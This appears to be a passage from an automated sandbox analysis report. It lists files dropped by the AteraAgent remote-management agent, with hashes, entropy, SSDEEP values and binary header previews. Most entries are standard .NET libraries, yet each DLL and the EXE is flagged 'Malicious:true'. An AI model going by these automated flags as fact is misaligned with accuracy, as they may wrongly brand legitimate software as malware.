                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:A1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7st:fIzm6pOIgvr74
                                                                                                                                                                                                                                                                                                                                  MD5:9D4A969B8B2C87AD7CEECEA0503FA835
                                                                                                                                                                                                                                                                                                                                  SHA1:9455C372B101F8EC50C26FCD3B7B23CC55456504
                                                                                                                                                                                                                                                                                                                                  SHA-256:EAE380E7C489AE01EF90388017DA03461343F28C64EDEF90F5A69668B9357213
                                                                                                                                                                                                                                                                                                                                  SHA-512:E7C5941BFDC5E1D361899DA6C7879BD7D93B8CF020CE799EDB5982B05249039F014214BCDE163D4DE85D5B6313A8BDABA0E38326A1B722F247066A58E5C04B3B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..((...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):398888
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.134343250444765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:njS6t1sm5LldNolZIkImcTi077Keb0wi0Lcr4so8mysKTqRjMnM6/ZmvO:n+e55LgIkTmyAAfTnMLvO
                                                                                                                                                                                                                                                                                                                                  MD5:209D8DA754B1C4231EDA61FF1273303F
                                                                                                                                                                                                                                                                                                                                  SHA1:2AEAD94EB934F6C826210EFF3D70D3656D0EE856
                                                                                                                                                                                                                                                                                                                                  SHA-256:4BE923D58770E34C8CD87E4B49F059E94ACA820EF9FB7B2D5FB52947560EB9A6
                                                                                                                                                                                                                                                                                                                                  SHA-512:B17BB121C3AB9D8F90E74C5576C009A9E1DF7BACF6CD4C802D8CF346A2A5F50B9A9DF04E0AB8BBB16DDABC2D65B7892D2BDB8C6B72C06CF213C387ACFFB120DC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`...........`.................................v...O.... ..................((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........P...................$.........................................{)...*..{*...*V.(+.....}).....}*...*...0..;........u......,/(,....{)....{)...o-...,.(.....{*....{*...o/...*.*. S]G. )UU.Z(,....{)...o0...X )UU.Z(.....{*...o1...X*.0...........r...p......%..{)....................-.q.............-.&.+.......o2....%..{*....................-.q.............-.&.+.......o2....(3...*..{4...*..{5...*..{6...*..{7...*..(+.....}4.....}5.....}6......}7...*....0..k........u......,_(,

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):710184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.960710164548092
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:+Bja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTU+:+Bjk38WuBcAbwoA/BkjSHXP36RMGn
                                                                                                                                                                                                                                                                                                                                  MD5:4CC2FAC21717C1A7BE8C5D835E563DCC
                                                                                                                                                                                                                                                                                                                                  SHA1:127E5C78F95AE42F9E79116D012D7346836C4AD0
                                                                                                                                                                                                                                                                                                                                  SHA-256:7F874FE9B0660202C7B46AA6B986713CD4C0A8505F5B7E318A0DDF9AB6B925F5
                                                                                                                                                                                                                                                                                                                                  SHA-512:9D1E26244A9701BA759D55B080F5D4DE0AA70569C21888AB30C5DE4237C46B63995717693349F6E0FF63E6DE7F0A86F4414E06C30C307D97E93F3C6D702BE931
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ......>}....`....................................O.......................((.......... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):154664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.990628902751052
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:Y4wM6OoRu7qywKsqxhDuPr5xJMnOfMAw3TkHjt0QQNOWIkHUsz72otHA3e:Y4wZywKn/U5xEwKIk0WB
                                                                                                                                                                                                                                                                                                                                  MD5:9AA88CE7FC21DBAFEB50D7F9015E0C5E
                                                                                                                                                                                                                                                                                                                                  SHA1:831C6815F9B6BEE06C5F40A1BF8941BB8D998090
                                                                                                                                                                                                                                                                                                                                  SHA-256:D59F20EBE0E9D42926152D7247A71991DC92D15261AC7232DF9AA245AE6938B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:6FDAA814FDA3AC901AD7251497E60DF8B627E028F6FCE99BFD91C559E0C29FA8D0C34F1BC381BEF3C8BB1823307ADA528CC415627F14C004ED821948F052D8BB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}.b..........." ..0..*..........6&... ...`....... ..............................#.....@..................................%..O....`...............4..((...........%..T............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................&......H............D...................$........................................{....*..{....*V.(......}......}....*...0..A........u........4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. R..0 )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....(!...*..{....*"..}....*..(....*:.(......(....*"..(....*f.(....%-.&+.(b.....(....*..(....*"..(....*...0..%.........("...(#...($....#.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Buffers.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6712317871537605
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:VrMdp9yXOfPfAxR5zwWvYW8aznNyb8E9VF6IYijSJIVxAFvL:VrMcXP64LEpYi60I
                                                                                                                                                                                                                                                                                                                                  MD5:3F7903882577EA2DDE5E44812EC5C581
                                                                                                                                                                                                                                                                                                                                  SHA1:CB95380833FE6A8BCC81731760BFBED8D75F1039
                                                                                                                                                                                                                                                                                                                                  SHA-256:F453F99E09E3D00FF38F5255E3429C62253975C3E9A3DF7BE27884823F7BB107
                                                                                                                                                                                                                                                                                                                                  SHA-512:480DD34D1D86CBA5A025D32DF49B6C1AEBD05A096F482753AD12B10FE52DBAA87E20AEE35FA9F49E50D730DB7394400E1D32E66C67B3C5A190F1412481543C49
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ..............................i.....@..................................B..O....`..@...............((...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):420392
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.109370194605785
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:05douWvsWkOfjL/MEd6/7vfA8SCW1nFNFfcaFeFOFwcGF6cmFWc0FWc8cIcKcUFl:0pjblhW1F
                                                                                                                                                                                                                                                                                                                                  MD5:7DA58F372D44CD35C2EE6EE65A790D8F
                                                                                                                                                                                                                                                                                                                                  SHA1:C1E165ECFD14FEFBD8BF3D2354F62168D2A83E71
                                                                                                                                                                                                                                                                                                                                  SHA-256:4CE48CC85CF820727954BDE51F19B9CAE86A98E33DF6F7E6120137A3C0A20402
                                                                                                                                                                                                                                                                                                                                  SHA-512:88D53764E64838191B9CA77CCC22C3CBB48AD7235AA0C6E37428A4D77A595E541B0329699F1415885FE78D4BADCD2F77A7097F2A014FB21FE9B7B0E8CBBCF826
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....d.........." ..0..8...........T... ...`....... ...............................W....`..................................T..O....`..p............B..((..........XS............................................... ............... ..H............text... 6... ...8.................. ..`.rsrc...p....`.......:..............@..@.reloc...............@..............@..B.................T......H........X..\V.................R......................................:.(;.....}....*..{....*:.(;.....}....*..{....*...0...........~<...}.....r...p}........(.....(.....(.....r)..p.(........(u.....~<...(=...,z.....s....}.......}.......}............{............%......(>....%...D....%...!....%...%.........%....%.........s....(B...*vra..p.(....,...}....*..}....*..{....*vr...p.(....,...}....*..}....*..{....*z.{....,......(>...o?...s@...z*.0..(........{....-..(......o....&....(j

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):64040
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.266474436775497
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:HYDFPV3uv9niVSmzPFX8lpJ6TJPe4TW9Lvu2perEuaRtIvqUl1FHEpYi607zS6:HKC9niwOepJ6TJPeb6NIUFg76KzS6
                                                                                                                                                                                                                                                                                                                                  MD5:1614C01C7C3CE47BD4D69F4BD1182A0A
                                                                                                                                                                                                                                                                                                                                  SHA1:0C848F1D040D5B7C6A8825821641AD7F16DF10A2
                                                                                                                                                                                                                                                                                                                                  SHA-256:9F8A4ED710DB570124AF15A05A7119C18A67BFA8F5D381DFC7F495AD1626384F
                                                                                                                                                                                                                                                                                                                                  SHA-512:E75999B1C2E2A9C1AB61B5152B051A79B063F7E03AC0AC4C43325F6324BF13E59949501B995A32C63572707DE600A110BA57BFD1AF3AB47774A3D51A37C1E499
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[............" ..0.................. ........... .......................@............`.................................k...O....... ...............((... ..........8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B........................H........[..h...........(.......0.........................................{#...*:.($.....}#...*..0..#........u......,.(%....{#....{#...o&...*.*v ..yN )UU.Z(%....{#...o'...X*....0..M........r...p......%..{#....................-.q.............-.&.+.......o(....()...*..{*...*:.($.....}*...*.0..#........u......,.(%....{*....{*...o&...*.*v ..:. )UU.Z(%....{*...o'...X*....0..M........r-..p......%..{*....................-.q.............-.&.+.......o(....()...*..{+...*..{,...*V.($...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Memory.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):142376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.160595508804938
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:oUGrszKKLBFa9DvrJGeesIf3afNs2AldfIlq0:DBFd3/aFs2h
                                                                                                                                                                                                                                                                                                                                  MD5:E00BB3C6EBBB9F175C18CA590577A313
                                                                                                                                                                                                                                                                                                                                  SHA1:A31434A65F3CC12164625A7976686BA219668E43
                                                                                                                                                                                                                                                                                                                                  SHA-256:F15B44ABEE072714B034B4F5AD0E204A27DEC0657E82F2474C2DE1BB73487B49
                                                                                                                                                                                                                                                                                                                                  SHA-512:C173B95EA158AECC185454D1E4DBDCB8F43BE3558082D57DB65EE98813D9872D9D0820FB19A562631FE7F908BFA8AAFE391EA539C2C61479D19B435EF93E6C33
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0.................. ... ....... .......................`......CY....@.................................X...O.... ..0...............((...@...... ................................................ ............... ..H............text........ ...................... ..`.rsrc...0.... ......................@..@.reloc.......@......................@..B........................H........,................................................................('...*>..}......}....*..{....*..{....*..{.....{....3..{.....{....((...*.*..0...........%.u....,..........(....*.*z.{....%-.&.+.o)....{....(a...*..(....zN........o*...s+...*.(....z.s,...*..(....zF(U....(O...s-...*.(....z.(V...s-...*.(....z.s....*.(....z.s/...*..(....zN........o*...s0...*.(....zrr...p(\....c.K...(O...s1...*.(....zBr...p(Y...s1...*.(....z.s2...*.(....z.(X...s3...*.(!...z.(_...s3...*.(#...z

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):110120
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.511348043938725
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:dPOw0SUUKw+GbgjMV+fCY1UiiGZ6qetMXIAMZ2zstK/Yb76W:dWw0SUUKBM8aOUiiGw7qa9tK/Ybh
                                                                                                                                                                                                                                                                                                                                  MD5:FCEEAAF25388DD233DB2BF03A8DB43ED
                                                                                                                                                                                                                                                                                                                                  SHA1:C2BC2D57CEBD9BE3B4F8EDA7656BB9EEE93E7C00
                                                                                                                                                                                                                                                                                                                                  SHA-256:0C4E97521C178BEC6C9A28BDA0A84858127CF3986A9F9090091A122CC9E116B4
                                                                                                                                                                                                                                                                                                                                  SHA-512:308DFEDD4FF7C1C9F8878D5997D51D9A6BE777EE9FD327BE915049E8F762B5ED0237DC7553A9DE8FE4BD98E3E76B07B41AEBAE6A5CCA183EF350D75B7024AA05
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0..v............... ........... ....................................@.................................f...O.......................((.......................................................... ............... ..H............text....u... ...v.................. ..`.rsrc................x..............@..@.reloc..............................@..B........................H........Q..|?..........$... ...D.........................................(....*&.l(....k*&.l(....k*..l.l(....k*..l.l(....k*&.l(....k*&.l(....k*&.l(....k*j~....%-.&(....s....%.....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2rG..p.(....*2r...p.(....*2r...p.(.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.67311343166089
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Nh06sbbVVPWU2WYNNyb8E9VF6IYijSJIVxeBbg:Ny9gpEpYi60Ac
                                                                                                                                                                                                                                                                                                                                  MD5:432E994CC9F82D38F3D438521AC8E3D9
                                                                                                                                                                                                                                                                                                                                  SHA1:8BF7F19AC04FC1E92F58E998AC6EAE451E4F67D8
                                                                                                                                                                                                                                                                                                                                  SHA-256:D5743DAC849AE08419FECB0C1DF0F68980AA0E24645EEE315B20114D6F96ADEB
                                                                                                                                                                                                                                                                                                                                  SHA-512:AF539F6F164EC5C06B6846CC6448A768AEF5DAC9CD51703885E6B56C83E62F5D6E2FC9F9B54EB3FB9CA1195957B73D269433436063401434A7E12704D6F681F4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................3... ...@....@.. ....................................@.................................@3..K....@..................((...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p3......H........$..0...................P ......................................._.%c......=.n')...(v..:}.d...3...B...).. .:Q(....L.jt....}Xv.b7y0r.[..$.....q..c.6.....p..2..qHv/.pb.=..9.o"z.. 0P.t%H....U...0...........q....*..0..............q....*...0..............q....*...0.................*.0....................*..0....................*..0............q.........*....0............q.........*....0............*..0..........*....0................*..0...............*...0..............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):19496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.521443897537438
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:YyPa16oAL4D+wW9IWmDIW4IWYDa9Nyb8E9VF6IYijSJIVxF/HLTa:YWs6oqDjADKeDa5EpYi60tTa
                                                                                                                                                                                                                                                                                                                                  MD5:D64D6BA70AA296A65C98A50DC8F01ED9
                                                                                                                                                                                                                                                                                                                                  SHA1:1742A71268A3306E0AD796DD09EEB9B9864CA9D3
                                                                                                                                                                                                                                                                                                                                  SHA-256:47633B5D5A83B0F80985D62B5F5C9A2DBDC5257ECBAF3C3C07B6AF98E33624CD
                                                                                                                                                                                                                                                                                                                                  SHA-512:BFF916F54C22C4B0D1709238D608DDEA0C3F90632E9A7E2ADA4E3C5DCF3AD67E3A4CC7F0F05ADFE471FBA6BF6648EEC3C5C91658676EBEC8D3409421E0D5E003
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.Z.........." ..0.............b2... ...@....... ....................................@..................................2..O....@...............$..((...`......x1............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......."..............@..B................B2......H........!..T....................0......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*2r[..p.(....*B.....(.........*.BSJB............v4.0.30319......l...4...#~..........#Strings....t.......#US.@.......

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.408608114983166
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:RjfAw5tisQ7Mkvwtwq6uUQ/B0X5tl9wCVjkz3pVS3UpoztjIF3Nyb8E9VF6IYiju:RksQ74GX7nwOa5VS2ozdIF7EpYi60C5
                                                                                                                                                                                                                                                                                                                                  MD5:B392A539476214703BDECB451F1286B6
                                                                                                                                                                                                                                                                                                                                  SHA1:F28DA8D40AF72D4EA08D9D904EC1B98711335125
                                                                                                                                                                                                                                                                                                                                  SHA-256:49554ACF71720003DC3287E56D4F4DC647886BF22E27D8B91233B92D626C90D8
                                                                                                                                                                                                                                                                                                                                  SHA-512:5E6C609B8C70F8D4CB87F64B6B00476A13497EBA170F71AA47F8DAD96CE80FD242A08417017FF3757ECF5B1F4EFF790E696A7A0E9D7714D8924BECD4080718B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g.........."...0..n..........r.... ........@.. ...................................`................................. ...O....................z..((.......................................................... ............... ..H............text...xm... ...n.................. ..`.rsrc................p..............@..@.reloc...............x..............@..B................T.......H........!...............1..@Z............................................(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....rY..p~....o....t....*.~....*..(....*Vs....(....t.........*.(.....(....(......,....s....o....*(....*.0..........(....o ...rm..p(!...(".....'...%.. .o#......i./..|s$......)...(.......(%....)...o&.......o'......i.0..+....o(......i.0..+....o)......i....+....o*...s+....o,.....,..(-.....&..*..................0..........(.... ....`(/.....&.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1547
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.008195800038022
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdsIOvPF7NhOXrRH2/dVxlPH2/FVQ7uH2/FVruH2/+mV0PH2/+w39y:3sIk7O7RgdjdgFSagFgg+msg+w3w
                                                                                                                                                                                                                                                                                                                                  MD5:029F543956E8B235A70112C77912150A
                                                                                                                                                                                                                                                                                                                                  SHA1:8F8916C78D9D3E5F92C37BDD39D34CD3B79BECA6
                                                                                                                                                                                                                                                                                                                                  SHA-256:33720B1985FE3F07F13744963085FA641F452EC393C3C8987A6023D0BC493BD1
                                                                                                                                                                                                                                                                                                                                  SHA-512:CF6EF25E7FD7E0B04A4F76B1552621874DAAA43838D0C028E62D1AABFFCD57AC7086A174BE9D5AF283DE8E8F09B5B40505478978102A1D8351681532B3828A38
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
